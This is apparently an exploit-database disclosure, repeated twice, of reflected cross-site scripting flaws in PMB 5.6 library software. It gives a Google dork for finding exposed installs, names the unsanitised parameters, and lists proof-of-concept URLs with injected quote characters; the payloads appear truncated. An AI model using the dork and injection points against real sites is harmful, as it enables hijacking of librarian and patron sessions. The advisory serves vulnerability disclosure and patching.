# Exploit Title: PMB 5.6 Cross Site Scripting XSS # Google Dork: inurl:opac_css # Date: 20-04-2020 # Exploit Author: 41-trk (Tarik Bakir) # Email: tarikbak999[at]gmail.com # Vendor Homepage: http://www.sigb.net # Software Link: http://forge.sigb.net/redmine/projects/pmb/files # Affected versions : <= 5.6 -==== Vulnerability ====- Variable $filename isn't properly sanitized in file /admin/sauvegarde/restaure.php. -==== POC ====- http://localhost/[PMB_PATH]//admin/sauvegarde/restaure.php?filename=">&critical=1 ================================ # Exploit Title: PMB 5.6 Cross Site Scripting XSS # Google Dork: inurl:opac_css # Date: 20-04-2020 # Exploit Author: 41-trk (Tarik Bakir) # Vendor Homepage: http://www.sigb.net # Software Link: http://forge.sigb.net/redmine/projects/pmb/files # Affected versions : <= 5.6 -==== Vulnerability ====- Variable $page isn't properly sanitized in file /opac_css/term_search.php Variable $id isn't properly sanitized in file /opac_css/ajax.php -==== POC ====- http://localhost/[PMB PATH]/opac_css/term_search.php?page=' http://localhost/[PMB PATH]/opac_css/ajax.php?module=ajax&categ=liste_lecture&quoifaire=show_form&id='" ================================